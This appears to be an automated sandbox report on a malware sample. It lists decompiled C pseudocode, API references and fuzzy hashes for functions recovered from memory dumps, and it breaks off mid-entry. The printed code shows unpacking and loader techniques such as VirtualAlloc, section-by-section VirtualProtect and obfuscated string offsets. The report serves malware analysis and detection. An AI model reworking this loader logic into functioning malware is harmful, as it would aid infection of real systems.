Function 00CF4EE5, Relevance: 7.7, APIs: 5, Instructions: 159
memoryCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E00CF4EE5(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t46;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E00CF54ED();
				if(_t21 != 0) {
					_t59 =  *0xcfd25c; // 0x2000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0xcfd25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0xcfd164(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E00CF3496( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0xcfd2a4; // 0x247a5a8
					if( *0xcfd25c > 5) {
						_t8 = _t26 + 0xcfe5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0xcfea15; // 0x44283a44
						_t27 = _t7;
					}
					E00CF61FB(_t27, _t27);
					_t31 = E00CF65B1(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0xcfd270 =  *0xcfd270 ^ 0x81bbe65d;
						_t32 = E00CF8D59(0x60);
						 *0xcfd324 = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0xcfd324; // 0x31795b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0xcfd324; // 0x31795b0
							 *_t51 = 0xcfe836;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0xcfd238, 0, 0x43);
							 *0xcfd2c4 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0xcfd25c; // 0x2000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0xcfd2a4; // 0x247a5a8
								_t13 = _t58 + 0xcfe55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0xcfc29f);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E00CF5DC6( ~_v8 &  *0xcfd270, 0xcfd00c); // executed
								_t54 = E00CF2E55(_t55);
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E00CF5672(_t55); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E00CF27F7(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t46 = E00CF4A32(__eflags,  &(_t65[4])); // executed
									_t54 = _t46;
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0xcfd160();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E00CF66F6(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}

0x00cf4ee5
0x00cf4ef0
0x00cf4ef3
0x00cf4ef6
0x00cf4ef9
0x00cf4f00
0x00cf4f02
0x00cf4f0e
0x00cf4f10
0x00cf4f10
0x00cf4f19
0x00cf4f1f
0x00cf4f24
0x00cf4f3e
0x00cf4f4a
0x00cf4f4c
0x00cf4f51
0x00cf4f5b
0x00cf4f5b
0x00cf4f53
0x00cf4f53
0x00cf4f53
0x00cf4f53
0x00cf4f62
0x00cf4f6f
0x00cf4f76
0x00cf4f7b
0x00cf4f7b
0x00cf4f83
0x00cf4f86
0x00cf4fac
0x00cf4fb8
0x00cf4fbd
0x00cf4fc2
0x00cf4fc4
0x00cf4ff0
0x00cf4ff2
0x00cf4fc6
0x00cf4fca
0x00cf4fcf
0x00cf4fd4
0x00cf4fdb
0x00cf4fe1
0x00cf4fe6
0x00cf4fec
0x00cf4ff3
0x00cf4ff5
0x00cf4ff7
0x00cf5006
0x00cf500c
0x00cf5011
0x00cf5013
0x00cf5043
0x00cf5045
0x00cf5015
0x00cf5015
0x00cf501b
0x00cf5028
0x00cf502e
0x00cf502e
0x00cf5036
0x00cf503f
0x00cf5046
0x00cf5048
0x00cf504a
0x00cf5051
0x00cf505e
0x00cf5068
0x00cf506a
0x00cf506c
0x00000000
0x00000000
0x00cf506e
0x00cf5073
0x00cf5075
0x00cf507c
0x00cf5080
0x00cf5083
0x00cf5098
0x00cf509c
0x00cf50a1
0x00000000
0x00cf50a1
0x00cf5085
0x00cf5087
0x00000000
0x00000000
0x00cf508d
0x00cf5092
0x00cf5094
0x00cf5096
0x00000000
0x00000000
0x00000000
0x00cf5096
0x00cf5079
0x00cf5079
0x00cf504a
0x00cf4f88
0x00cf4f88
0x00cf4f8d
0x00cf50a3
0x00cf50a7
0x00cf50af
0x00cf50af
0x00000000
0x00cf50a7
0x00cf4f93
0x00cf4f96
0x00cf4fa0
0x00cf4fa7
0x00000000
0x00cf50b7
0x00cf50b7
0x00cf50bb
0x00cf50bf
0x00cf50bf

APIs

Part of subcall function 00CF54ED: GetModuleHandleA.KERNEL32(4C44544E,00000000,00CF4EFE,00000000,00000000), ref: 00CF54FC

CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 00CF4F7B

Part of subcall function 00CF8D59: RtlAllocateHeap.NTDLL(00000000,00000000,00CF9099), ref: 00CF8D65

memset.NTDLL ref: 00CF4FCA
RtlInitializeCriticalSection.NTDLL(03179570), ref: 00CF4FDB

Part of subcall function 00CF4A32: memset.NTDLL ref: 00CF4A47
Part of subcall function 00CF4A32: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 00CF4A7B
Part of subcall function 00CF4A32: StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 00CF4A86

RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 00CF5006
wsprintfA.USER32 ref: 00CF5036

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
String ID:
API String ID: 4246211962-0
Opcode ID: 53bd194f7a0fd1d050fe4c173749caa5700664f5821fdc2035c0a2de78145dd4
Instruction ID: 620225c7197d0e2097ffeb394485b442cf0983e50bfba7d0fe2e9672d02f799f
Opcode Fuzzy Hash: 53bd194f7a0fd1d050fe4c173749caa5700664f5821fdc2035c0a2de78145dd4
Instruction Fuzzy Hash: 8451D271A0161CAFDBA5EBE4DC89B7E77B9AB04710F100426F316D7291EA709E00DB93

Uniqueness

Uniqueness Score: -1.00%

Function 00CF6466, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 00CF64C3
SysAllocString.OLEAUT32(00CF6843), ref: 00CF6507
SysFreeString.OLEAUT32(00000000), ref: 00CF651B
SysFreeString.OLEAUT32(00000000), ref: 00CF6529

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: b8a52768a01bc247f5715633658d769d184152fc777ab54b6ab63a731e7c8100
Instruction ID: 12738d8fe95903880bbe1745baccdc5fd853ef174a80768b0903b7c79f0bd3b1
Opcode Fuzzy Hash: b8a52768a01bc247f5715633658d769d184152fc777ab54b6ab63a731e7c8100
Instruction Fuzzy Hash: A931FE75900109EFCB05DF98D9D49BE7BB9EF48300B10842EFA16EB250D731DA45CB62

Uniqueness

Uniqueness Score: -1.00%

Function 1000167E, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E1000167E(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				unsigned int _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v44;
				signed int _v48;
				intOrPtr _t39;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				signed int _t59;
				signed int _t61;
				intOrPtr _t66;
				intOrPtr _t77;
				void* _t78;
				signed int _t80;

				_t77 =  *0x10004130;
				_t39 = E10001F20(_t77,  &_v20,  &_v12);
				_v16 = _t39;
				if(_t39 == 0) {
					asm("sbb ebx, ebx");
					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
					_t78 = _t77 + _v20;
					_v36 = _t78;
					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
					_v24 = _t46;
					if(_t46 == 0) {
						_v16 = 8;
					} else {
						_t61 = 0;
						if(_t59 <= 0) {
							_t47 =  *0x10004140;
						} else {
							_t66 = _a4;
							_t50 = _t46 - _t78;
							_t11 = _t66 + 0x100051a2; // 0x100051a2
							_v28 = _t50;
							_v32 = _t50 + _t11;
							_v8 = _t78;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t19 = _t61 + 1; // 0x2
								_t80 = _t19;
								E10001531(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
								_t64 = _v32;
								_v8 = _v8 + 0x1000;
								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
								_t61 = _t80;
								 *0x10004140 = _t47;
								if(_t61 >= _t59) {
									break;
								}
								_t50 = _v28;
							}
						}
						if(_t47 != 0x63699bc3) {
							_v16 = 0xc;
						} else {
							memcpy(_v36, _v24, _v12);
						}
						VirtualFree(_v24, 0, 0x8000); // executed
					}
				}
				return _v16;
			}

0x10001685
0x10001695
0x1000169a
0x1000169f
0x100016b4
0x100016bb
0x100016c0
0x100016d1
0x100016d4
0x100016da
0x100016df
0x10001789
0x100016e5
0x100016e5
0x100016e9
0x10001751
0x100016eb
0x100016eb
0x100016ee
0x100016f0
0x100016f8
0x100016fb
0x100016fe
0x10001706
0x1000170e
0x1000170f
0x10001710
0x10001717
0x10001717
0x1000172b
0x10001730
0x10001739
0x10001740
0x10001743
0x10001745
0x1000174c
0x00000000
0x00000000
0x10001703
0x10001703
0x1000174e
0x1000175b
0x10001770
0x1000175d
0x10001766
0x1000176b
0x10001781
0x10001781
0x10001790
0x10001796

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00000000,10001A05,?,00000000,?,?,?,?,?,?,?,10001A05), ref: 100016D4
memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,10001A05,00000000), ref: 10001766
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,?,?,?,10001A05), ref: 10001781

Strings

Dec 20 2020, xrefs: 10001706

Memory Dump Source

Source File: 00000001.00000002.593901032.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.593964557.0000000010005000.00000040.00000001.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Dec 20 2020
API String ID: 4010158826-3924289079
Opcode ID: 69ab0c6b9a32fe260e2a7950d9aeabe6de4b3ad5f898016cbd094064ed0b85a9
Instruction ID: a679fd416aaa6582b651e1e6bdd6db80fafe1ab0732a7248efed1bbdfeb6c3d2
Opcode Fuzzy Hash: 69ab0c6b9a32fe260e2a7950d9aeabe6de4b3ad5f898016cbd094064ed0b85a9
Instruction Fuzzy Hash: BB318675D0421AEFEB01CF99C881BDEB7B9FF48384F108165E904B7249D771AA45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00CF3231, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00CF3231(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E00CF8D59(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x00cf323d
0x00cf3241
0x00cf3242
0x00cf3243
0x00cf3245
0x00cf3247
0x00cf324a
0x00cf324f
0x00cf32e6
0x00cf32ed
0x00cf32ed
0x00cf3258
0x00cf325f
0x00cf326f
0x00cf326f
0x00cf3275
0x00cf3277
0x00cf327c
0x00cf3285
0x00cf328b
0x00cf3290
0x00cf329b
0x00cf329f
0x00cf32a1
0x00cf32a2
0x00cf32ab
0x00cf32af
0x00cf32c0
0x00cf32b1
0x00cf32b6
0x00cf32bb
0x00cf32ca
0x00cf32ca
0x00cf329f
0x00cf32d0
0x00cf32d6
0x00cf32d6
0x00cf32df
0x00cf32e4
0x00cf32e4
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 00CF325F
lstrlenW.KERNEL32(?), ref: 00CF3295
memcpy.NTDLL(00000000,?,?,?), ref: 00CF32B6
SysFreeString.OLEAUT32(?), ref: 00CF32CA

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: c5d19b494d63a1a6412152cb1b17626877b9e71b6a0c6b8bf399ac3296f944cb
Instruction ID: b75706180694b800b63354bc9943657d9e3082e0baea1736bcd7c85679e1388e
Opcode Fuzzy Hash: c5d19b494d63a1a6412152cb1b17626877b9e71b6a0c6b8bf399ac3296f944cb
Instruction Fuzzy Hash: 1C213E75A0020DFFCB51DFA4D988AAEBBB4FF48314B104169EA05E7211EB30DB45DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00C81490, Relevance: 4.7, APIs: 3, Instructions: 240memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00C814D5
VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 00C8159F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 00C816D0

Memory Dump Source

Source File: 00000001.00000002.590451762.0000000000C60000.00000040.00000001.sdmp, Offset: 00C60000, based on PE: false

Similarity

API ID: Virtual$Alloc$Protect
String ID:
API String ID: 655996629-0
Opcode ID: 1250ec620a4be35fa338938c7b5d3a0123910a051396139492b3008c14b8adba
Instruction ID: 296476839ab01bf5a4222396a452fbb8a23e4ad8b8e1fbed5e3d5bb4d983546f
Opcode Fuzzy Hash: 1250ec620a4be35fa338938c7b5d3a0123910a051396139492b3008c14b8adba
Instruction Fuzzy Hash: 1BB1A9B4A00109DFCB48DF85C590AAEB7B5FF88304F248159E919AB345D735EE82CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00CF5C8C, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CF5C8C() {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t51;

				_v12 = 0;
				_t23 = E00CF576C(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0xcfd2a4; // 0x247a5a8
				_t4 = _t24 + 0xcfedd0; // 0x3179378
				_t5 = _t24 + 0xcfed78; // 0x4f0053
				_t26 = E00CF2AFE( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0xcfd2a4; // 0x247a5a8
						_t11 = _t32 + 0xcfedc4; // 0x317936c
						_t48 = _t11;
						_t12 = _t32 + 0xcfed78; // 0x4f0053
						_t51 = E00CF1FE0(_t11, _t12, _t11);
						_t58 = _t51;
						if(_t51 != 0) {
							_t35 =  *0xcfd2a4; // 0x247a5a8
							_t13 = _t35 + 0xcfee0e; // 0x30314549
							if(E00CF6C44(_t48, _t58, _v8, _t51, _t13, 0x14) == 0) {
								_t60 =  *0xcfd25c - 6;
								if( *0xcfd25c <= 6) {
									_t42 =  *0xcfd2a4; // 0x247a5a8
									_t15 = _t42 + 0xcfec2a; // 0x52384549
									E00CF6C44(_t48, _t60, _v8, _t51, _t15, 0x13);
								}
							}
							_t38 =  *0xcfd2a4; // 0x247a5a8
							_t17 = _t38 + 0xcfee08; // 0x31793b0
							_t18 = _t38 + 0xcfede0; // 0x680043
							_t45 = E00CF5931(_v8, 0x80000001, _t51, _t18, _t17);
							HeapFree( *0xcfd238, 0, _t51);
						}
					}
					HeapFree( *0xcfd238, 0, _v16);
				}
				_t53 = _v8;
				if(_v8 != 0) {
					E00CF3822(_t53);
				}
				return _t45;
			}

0x00cf5c9c
0x00cf5c9f
0x00cf5ca6
0x00cf5ca8
0x00cf5ca8
0x00cf5cab
0x00cf5cb0
0x00cf5cb7
0x00cf5cc4
0x00cf5cc9
0x00cf5ccd
0x00cf5cdb
0x00cf5ce9
0x00cf5ced
0x00cf5d7e
0x00cf5d7e
0x00cf5cf3
0x00cf5cf3
0x00cf5cf8
0x00cf5cf8
0x00cf5cff
0x00cf5d0b
0x00cf5d0d
0x00cf5d0f
0x00cf5d11
0x00cf5d18
0x00cf5d2a
0x00cf5d2c
0x00cf5d33
0x00cf5d35
0x00cf5d3c
0x00cf5d47
0x00cf5d47
0x00cf5d33
0x00cf5d4c
0x00cf5d51
0x00cf5d58
0x00cf5d76
0x00cf5d78
0x00cf5d78
0x00cf5d0f
0x00cf5d8a
0x00cf5d8a
0x00cf5d8c
0x00cf5d91
0x00cf5d93
0x00cf5d93
0x00cf5d9e

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,03179378,00000000,?,74B5F710,00000000,74B5F730), ref: 00CF5CDB
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,031793B0,?,00000000,30314549,00000014,004F0053,0317936C), ref: 00CF5D78
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00CF2885), ref: 00CF5D8A

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c96378289a36fb18b116e23469d557e80d13f16eb86bb3eb91a6163f7521a186
Instruction ID: 54cc609154d16c8dfa79715ad963e50f5edc241a0661a3872c07d717b31f92a3
Opcode Fuzzy Hash: c96378289a36fb18b116e23469d557e80d13f16eb86bb3eb91a6163f7521a186
Instruction Fuzzy Hash: BD318C32600508AFDB20ABA4DD88FBEBBBEEB44740B1500A5B7159B071D6709E05EB92

Uniqueness

Uniqueness Score: -1.00%

Function 00CF9425, Relevance: 4.6, APIs: 3, Instructions: 77
memoryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00CF9425(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t19;
				void* _t25;
				void* _t26;
				void* _t31;
				void* _t37;
				void* _t41;
				intOrPtr _t43;
				void* _t44;

				_t37 = __edx;
				_t33 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t43 =  *0xcfd2a4; // 0x247a5a8
				_push(0x800);
				_push(0);
				_push( *0xcfd238);
				_t1 = _t43 + 0xcfe791; // 0x6976612e
				_t44 = _t1;
				if( *0xcfd24c >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t31 = 8;
						L7:
						if(_t31 != 0) {
							L10:
							 *0xcfd24c =  *0xcfd24c + 1;
							L11:
							return _t31;
						}
						_t46 = _a4;
						_t41 = _v8;
						 *_a16 = _a4;
						 *_a20 = E00CF4D95(_a4, _t41); // executed
						_t19 = E00CF315A(_t41, _t41, _t46); // executed
						if(_t19 != 0) {
							 *_a8 = _t41;
							 *_a12 = _t19;
							if( *0xcfd24c < 5) {
								 *0xcfd24c =  *0xcfd24c & 0x00000000;
							}
							goto L11;
						}
						_t31 = 0xbf;
						E00CF5BEA();
						RtlFreeHeap( *0xcfd238, 0, _t41); // executed
						goto L10;
					}
					_t25 = E00CF1D4C(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t14);
					L5:
					_t31 = _t25;
					goto L7;
				}
				_t26 = RtlAllocateHeap(); // executed
				if(_t26 == 0) {
					goto L6;
				}
				_t25 = E00CF12C4(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t26); // executed
				goto L5;
			}

0x00cf9425
0x00cf9425
0x00cf9428
0x00cf9429
0x00cf9433
0x00cf943a
0x00cf943f
0x00cf9441
0x00cf9447
0x00cf9447
0x00cf944d
0x00cf9475
0x00cf948d
0x00cf948f
0x00cf9490
0x00cf9492
0x00cf94d0
0x00cf94d0
0x00cf94d6
0x00cf94dc
0x00cf94dc
0x00cf9494
0x00cf949a
0x00cf949d
0x00cf94ac
0x00cf94ae
0x00cf94b5
0x00cf94e9
0x00cf94ee
0x00cf94f0
0x00cf94f2
0x00cf94f2
0x00000000
0x00cf94f0
0x00cf94b7
0x00cf94bc
0x00cf94ca
0x00000000
0x00cf94ca
0x00cf9484
0x00cf9489
0x00cf9489
0x00000000
0x00cf9489
0x00cf944f
0x00cf9457
0x00000000
0x00000000
0x00cf9466
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,74B5F710), ref: 00CF944F

Part of subcall function 00CF12C4: GetTickCount.KERNEL32 ref: 00CF12D8
Part of subcall function 00CF12C4: wsprintfA.USER32 ref: 00CF1328
Part of subcall function 00CF12C4: wsprintfA.USER32 ref: 00CF1345
Part of subcall function 00CF12C4: wsprintfA.USER32 ref: 00CF1371
Part of subcall function 00CF12C4: HeapFree.KERNEL32(00000000,?), ref: 00CF1383
Part of subcall function 00CF12C4: wsprintfA.USER32 ref: 00CF13A4
Part of subcall function 00CF12C4: HeapFree.KERNEL32(00000000,?), ref: 00CF13B4
Part of subcall function 00CF12C4: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00CF13E2
Part of subcall function 00CF12C4: GetTickCount.KERNEL32 ref: 00CF13F3

RtlAllocateHeap.NTDLL(00000000,00000800,74B5F710), ref: 00CF946D
RtlFreeHeap.NTDLL(00000000,00000002,00CF28D0,?,00CF28D0,00000002,?,?,00CF50A1,?), ref: 00CF94CA

Memory Dump Source

Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$wsprintf$AllocateFree$CountTick
String ID:
API String ID: 1676223858-0
Opcode ID: bb0a3cbe6d9fb190b428cec6bccfb56fdec8b5026c8f013da81f7aa62b5e21d2
Instruction ID: 146769582aadc5cff07421bc9a2c6ed3d672a408fd5ba092ada4d788bfcdfbb0
Opcode Fuzzy Hash: bb0a3cbe6d9fb190b428cec6bccfb56fdec8b5026c8f013da81f7aa62b5e21d2
Instruction Fuzzy Hash: 28213976600208EBCB519F59DC44FBE3BADEB55345F104026FA029B261DB70EA06DBA3

Uniqueness

Uniqueness Score: -1.00%

Function 100015BC, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E100015BC(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				long _v16;
				signed int _v20;
				signed int _t31;
				long _t33;
				int _t34;
				signed int _t35;
				signed int _t42;
				void* _t50;
				void* _t51;
				signed int _t54;

				_v12 = _v12 & 0x00000000;
				_t42 =  *(__eax + 6) & 0x0000ffff;
				_t50 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v20 = _t42;
				_t31 = VirtualProtect(_a4,  *(__eax + 0x54), 4,  &_v16); // executed
				_v8 = _v8 & 0x00000000;
				if(_t42 <= 0) {
					L11:
					return _v12;
				}
				_t51 = _t50 + 0x24;
				while(1) {
					_t54 = _v12;
					if(_t54 != 0) {
						goto L11;
					}
					asm("bt dword [esi], 0x1d");
					if(_t54 >= 0) {
						asm("bt dword [esi], 0x1e");
						if(__eflags >= 0) {
							_t33 = 4;
						} else {
							asm("bt dword [esi], 0x1f");
							_t35 = 0;
							_t33 = (_t35 & 0xffffff00 | __eflags > 0x00000000) + (_t35 & 0xffffff00 | __eflags > 0x00000000) + 2;
						}
					} else {
						asm("bt dword [esi], 0x1f");
						asm("sbb eax, eax");
						_t33 = ( ~((_t31 & 0xffffff00 | _t54 > 0x00000000) & 0x000000ff) & 0x00000020) + 0x20;
					}
					_t34 = VirtualProtect( *((intOrPtr*)(_t51 - 0x18)) + _a4,  *(_t51 - 0x1c), _t33,  &_v16); // executed
					if(_t34 == 0) {
						_v12 = GetLastError();
					}
					_t51 = _t51 + 0x28;
					_v8 = _v8 + 1;
					_t31 = _v8;
					if(_t31 < _v20) {
						continue;
					} else {
						goto L11;
					}
				}
				goto L11;
			}

0x100015c6
0x100015cb
0x100015d7
0x100015e4
0x100015ea
0x100015ec
0x100015f2
0x1000165f
0x10001666
0x10001666
0x100015f4
0x100015f7
0x100015f7
0x100015fb
0x00000000
0x00000000
0x100015fd
0x10001601
0x10001619
0x1000161d
0x10001631
0x1000161f
0x1000161f
0x10001625
0x10001629
0x10001629
0x10001603
0x10001603
0x1000160f
0x10001614
0x10001614
0x10001642
0x10001646
0x1000164e
0x1000164e
0x10001651
0x10001654
0x10001657
0x1000165d
0x00000000
0x00000000
0x00000000
0x00000000
0x1000165d
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,00000004,?,?,?,00000000,?,?), ref: 100015EA
VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 10001642
GetLastError.KERNEL32 ref: 10001648

Memory Dump Source

Source File: 00000001.00000002.593901032.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.593964557.0000000010005000.00000040.00000001.sdmp Download File

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: 83e6e04bcd366fded1c35c8b269c89bea0f76d85a8c834e0f0ae9599731ac213
